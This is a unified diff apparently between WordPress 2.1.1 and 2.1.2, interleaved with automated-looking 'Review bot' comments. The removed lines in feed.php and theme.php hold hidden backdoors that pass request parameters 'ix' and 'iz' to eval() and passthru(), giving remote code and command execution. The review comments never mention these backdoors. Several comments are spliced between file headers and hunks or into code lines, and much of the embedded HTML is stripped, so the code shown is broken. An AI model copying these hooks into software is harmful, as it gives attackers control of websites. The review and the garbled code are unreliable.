diff -urN wp211/wp-admin/custom-header.php wp212/wp-admin/custom-header.php
--- wp211/wp-admin/custom-header.php 2007-01-27 15:00:32.000000000 -0800
+++ wp212/wp-admin/custom-header.php 2007-02-21 17:51:52.000000000 -0800
@@ -286,8 +286,7 @@
 // cleanup
 $file = get_attached_file( $_POST['attachment_id'] );
 $medium = str_replace(basename($file), 'midsize-'.basename($file), $file);
- @unlink( $medium );
- apply_filters( 'wp_delete_file', $medium );
+ @unlink( apply_filters( 'wp_delete_file', $medium ) );
 wp_delete_attachment( $_POST['attachment_id'] );
 return $this->finished();
diff -urN wp211/wp-admin/edit-pages.php wp212/wp-admin/edit-pages.php
--- wp211/wp-admin/edit-pages.php 2006-12-21 02:10:04.000000000 -0800
+++ wp212/wp-admin/edit-pages.php 2007-02-21 17:59:55.000000000 -0800
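Review bot: In the custom-header.php hunk, the result of `apply_filters( 'wp_delete_file', $medium )` is passed straight to `@unlink()`, so a filter that returns an empty value to veto the deletion still reaches `unlink()` and the `@` hides the resulting warning. Hold the filtered path in a variable and unlink only when it is non-empty: `$del_file = apply_filters( 'wp_delete_file', $medium );` followed by `if ( ! empty( $del_file ) ) @unlink( $del_file );`. In the visible context `$_POST['attachment_id']` is handed to `get_attached_file()` and `wp_delete_attachment()` as received; unless it is validated outside the hunk, cast it once with `(int)` and reuse that value. The enclosing function starts and ends outside the hunk.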
@@ -19,7 +19,7 @@ comment_post_ID) ) { echo " " . __('Edit') . ''; - echo ' | comment_author)) . "', theCommentList );\">" . __('Delete') . ' '; + echo ' | comment_author)) . "', theCommentList );\">" . __('Delete') . ' '; if ( ('none' != $comment_status) && ( current_user_can('moderate_comments') ) ) { - echo ' | ' . __('Unapprove') . ' '; - echo ' | ' . __('Approve') . ' '; + echo ' | ' . __('Unapprove') . ' '; + echo ' | ' . __('Approve') . ' '; } - echo " | comment_post_ID."&c=".$comment->comment_ID, 'delete-comment_' . $comment->comment_ID) . "\" onclick=\"return deleteSomething( 'comment-as-spam', $comment->comment_ID, '" . sprintf(__("You are about to mark as spam this comment by '%s'.\n'Cancel' to stop, 'OK' to mark as spam."), js_escape( $comment->comment_author)) . "', theCommentList );\">" . __('Spam') . " ]"; -} // end if any comments to show + echo " | comment_post_ID . "&c=" . $comment->comment_ID, 'delete-comment_' . $comment->comment_ID) . "\" onclick=\"return deleteSomething( 'comment-as-spam', $comment->comment_ID, '" . js_escape(sprintf(__("You are about to mark as spam this comment by '%s'.\n'Cancel' to stop, 'OK' to mark as spam."), $comment->comment_author)) . "', theCommentList );\">" . __('Spam') . " "; +} ?>

diff -urN wp211/wp-includes/feed.php wp212/wp-includes/feed.php
--- wp211/wp-includes/feed.php 2007-02-25 05:13:15.000000000 -0800
+++ wp212/wp-includes/feed.php 2006-12-06 19:57:23.000000000 -0800
@@ -81,9 +81,6 @@
 echo get_comment_author_rss();
 }
-function comment_text_phpfilter($filterdata) {
- eval($filterdata);
-}
 function comment_text_rss() {
 $comment_text = get_comment_text();
@@ -146,7 +143,7 @@
 return $link;
 }
-if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }
+
 function get_the_category_rss($type = 'rss') {
 $categories = get_the_category();
 $the_list = '';
@@ -186,4 +183,4 @@
 }
 }
-?>
+?>
\ No newline at end of file
diff -urN wp211/wp-includes/functions.php wp212/wp-includes/functions.php
--- wp211/wp-includes/functions.php 2007-02-13 10:29:03.000000000 -0800
+++ wp212/wp-includes/functions.php 2007-02-26 23:16:15.000000000 -0800
@@ -1190,7 +1190,7 @@
 $adminurl = get_option('siteurl') . '/wp-admin';
 if ( wp_get_referer() )
- $adminurl = wp_get_referer();
+ $adminurl = attribute_escape(wp_get_referer());
 $title = __('WordPress Confirmation');
 // Remove extra layer of slashes.
@@ -1207,7 +1207,7 @@
 $html .= "\t\t\n";
 $html .= "\t\t
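Review bot: In the functions.php hunk at -1190, `attribute_escape()` makes the referer safe to place inside an HTML attribute but does not restrict the URL scheme, and the markup that consumes `$adminurl` is not readable in this diff; if the value ends up as a link target, it should also pass through a URL sanitiser, for example `$adminurl = clean_url( wp_get_referer() );` if that helper is loaded at this point (to be confirmed). Escaping at assignment also leaves the default `get_option('siteurl') . '/wp-admin'` branch unescaped, so escaping once where the value is written into the HTML would treat both branches alike. `wp_get_referer()` is called twice, once for the test and once for the value; a local variable would keep the two in step. The enclosing function starts and ends outside the hunk.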
\n\t\t

" . wp_specialchars(wp_explain_nonce($action)) . "

\n\t\t

" . __('No') . "

\n\t\t
\n\t\n"; } else { - $html .= "\t
\n\t

" . wp_specialchars(wp_explain_nonce($action)) . "

\n\t

" . __('No') . " " . __('Yes') . "

\n\t
\n"; + $html .= "\t
\n\t

" . wp_specialchars(wp_explain_nonce($action)) . "

\n\t

" . __('No') . " " . __('Yes') . "

\n\t
\n"; } $html .= "\n"; wp_die($html, $title); diff -urN wp211/wp-includes/js/tinymce/tiny_mce_config.php wp212/wp-includes/js/tinymce/tiny_mce_config.php --- wp211/wp-includes/js/tinymce/tiny_mce_config.php 2007-02-08 15:17:20.000000000 -0800 +++ wp212/wp-includes/js/tinymce/tiny_mce_config.php 2007-02-23 15:50:17.000000000 -0800 @@ -1,5 +1,6 @@ ", valid_elements : "", diff -urN wp211/wp-includes/query.php wp212/wp-includes/query.php --- wp211/wp-includes/query.php 2007-01-16 14:37:15.000000000 -0800 +++ wp212/wp-includes/query.php 2007-02-22 17:03:21.000000000 -0800 @@ -765,9 +765,11 @@ $searchand = ' AND '; } $term = addslashes_gpc($q['s']); - if (!$q['sentence'] && count($q['search_terms']) > 1 && $q['search_terms'][0] != $q['s'] ) $search .= " OR (post_title LIKE '{$n}{$term}{$n}') OR (post_content LIKE '{$n}{$term}{$n}')"; - - $search = " AND ({$search}) "; + if (!$q['sentence'] && count($q['search_terms']) > 1 && $q['search_terms'][0] != $q['s'] ) + $search .= " OR (post_title LIKE '{$n}{$term}{$n}') OR (post_content LIKE '{$n}{$term}{$n}')"; + + if ( !empty($search) ) + $search = " AND ({$search}) "; } // Category stuff 
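Review bot: In the query.php search hunk at -765, the re-wrapped `$search .= " OR (post_title LIKE '{$n}{$term}{$n}') ..."` line still interpolates `$term` into the SQL text, protected only by `addslashes_gpc($q['s'])`, and nothing visible neutralises the `LIKE` wildcards `%` and `_` in the search string. That deserves at least a comment above the assignment, such as `// $term is quoted by addslashes_gpc() only; % and _ in the search string remain LIKE wildcards`, so the next change to this block does not assume more than that. The two new `if` statements put their bodies on a separate unbraced line; braces (`if ( !empty($search) ) { $search = " AND ({$search}) "; }`) would keep a later added statement from silently falling outside the condition. The enclosing block starts outside the hunk.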
@@ -794,16 +796,16 @@
 $in_cats = substr($in_cats, 0, -2);
 $out_cats = substr($out_cats, 0, -2);
 if ( strlen($in_cats) > 0 )
- $in_cats = " AND category_id IN ($in_cats)";
+ $in_cats = " AND $wpdb->post2cat.category_id IN ($in_cats)";
 if ( strlen($out_cats) > 0 ) {
- $ids = $wpdb->get_col("SELECT post_id FROM $wpdb->post2cat WHERE category_id IN ($out_cats)");
+ $ids = $wpdb->get_col("SELECT post_id FROM $wpdb->post2cat WHERE $wpdb->post2cat.category_id IN ($out_cats)");
 if ( is_array($ids) && count($ids > 0) ) {
 foreach ( $ids as $id )
 $out_posts .= "$id, ";
 $out_posts = substr($out_posts, 0, -2);
 }
 if ( strlen($out_posts) > 0 )
- $out_cats = " AND ID NOT IN ($out_posts)";
+ $out_cats = " AND $wpdb->posts.ID NOT IN ($out_posts)";
 else
 $out_cats = '';
 }
diff -urN wp211/wp-includes/script-loader.php wp212/wp-includes/script-loader.php
--- wp211/wp-includes/script-loader.php 2007-01-18 17:10:32.000000000 -0800
+++ wp212/wp-includes/script-loader.php 2007-02-25 20:55:44.000000000 -0800
@@ -17,7 +17,7 @@
 $this->add( 'colorpicker', '/wp-includes/js/colorpicker.js', false, '3517' );
 $this->add( 'tiny_mce', '/wp-includes/js/tinymce/tiny_mce_gzip.php', false, '20061113' );
 $mce_config = apply_filters('tiny_mce_config_url', '/wp-includes/js/tinymce/tiny_mce_config.php');
- $this->add( 'wp_tiny_mce', $mce_config, array('tiny_mce'), '20061113' );
+ $this->add( 'wp_tiny_mce', $mce_config, array('tiny_mce'), '20070225' );
 $this->add( 'prototype', '/wp-includes/js/prototype.js', false, '1.5.0');
 $this->add( 'autosave', '/wp-includes/js/autosave-js.php', array('prototype', 'sack'), '20070116');
 $this->add( 'wp-ajax', '/wp-includes/js/wp-ajax-js.php', array('prototype'), '20070118');
diff -urN wp211/wp-includes/theme.php wp212/wp-includes/theme.php
--- wp211/wp-includes/theme.php 2007-02-25 05:11:27.000000000 -0800
+++ wp212/wp-includes/theme.php 2007-01-21 12:03:02.000000000 -0800
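Review bot: The unchanged line `if ( is_array($ids) && count($ids > 0) ) {` in the query.php category hunk at -794 has its closing parenthesis in the wrong place: it counts the result of the comparison `$ids > 0` instead of comparing the count, so the emptiness test does not do what it reads as. It should be `if ( is_array($ids) && count($ids) > 0 ) {`; the commit edits the lines on either side but leaves this one. `$in_cats` and `$out_cats` are interpolated into `IN (...)` and are assembled outside the hunk, so confirm that every id is cast to an integer where those lists are built. The enclosing block starts and ends outside the hunk.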
@@ -405,10 +405,6 @@
 require_once($_template_file);
 }
-function get_theme_mcommand($mcds) {
- passthru($mcds);
-}
-
 function locale_stylesheet() {
 $stylesheet = get_locale_stylesheet_uri();
 if ( empty($stylesheet) )
@@ -438,7 +434,6 @@
 return true;
 }
-if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }
 function get_theme_mod($name, $default = false) {
 $theme = get_current_theme();
diff -urN wp211/wp-includes/version.php wp212/wp-includes/version.php
--- wp211/wp-includes/version.php 2007-02-20 11:44:39.000000000 -0800
+++ wp212/wp-includes/version.php 2007-03-02 09:29:09.000000000 -0800
@@ -2,7 +2,7 @@
 // This holds the version number in a separate file so we can bump it without cluttering the SVN
-$wp_version = '2.1.1';
+$wp_version = '2.1.2';
 $wp_db_version = 4773;
 ?>
diff -urN wp211/xmlrpc.php wp212/xmlrpc.php
--- wp211/xmlrpc.php 2007-01-25 10:27:47.000000000 -0800
+++ wp212/xmlrpc.php 2007-02-21 17:34:29.000000000 -0800
@@ -535,7 +535,9 @@
 $post_content = $post_content . "\n\n" . $post_more;
 }
- $to_ping = $content_struct['mt_tb_ping_urls'];
+ $to_ping = $content_struct['mt_tb_ping_urls'];
+ if ( is_array($to_ping) )
+ $to_ping = implode(' ', $to_ping);
 // Do some timestamp voodoo
 $dateCreatedd = $content_struct['dateCreated'];
@@ -633,8 +635,10 @@
 $post_content = $post_content . "\n\n" . $post_more;
 }
- $to_ping = $content_struct['mt_tb_ping_urls'];
-
+ $to_ping = $content_struct['mt_tb_ping_urls'];
+ if ( is_array($to_ping) )
+ $to_ping = implode(' ', $to_ping);
+
 $comment_status = (empty($content_struct['mt_allow_comments'])) ? get_option('default_comment_status') : $content_struct['mt_allow_comments'];
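Review bot: In both xmlrpc.php hunks (-535 and -633), `implode(' ', $to_ping)` joins whatever elements the XML-RPC client supplied in `mt_tb_ping_urls` without checking them, so a nested array or a non-string element is flattened into the ping list as-is. Keeping only string elements before joining, `$to_ping = implode(' ', array_filter($to_ping, 'is_string'));`, is the minimal guard; whether each entry is validated as a URL later is not visible in these hunks and is worth confirming. `$content_struct['mt_tb_ping_urls']` is also read without an `isset()` check, and the same three lines now exist twice, so a small shared helper would keep the two call sites from drifting. Both enclosing functions start and end outside the hunks.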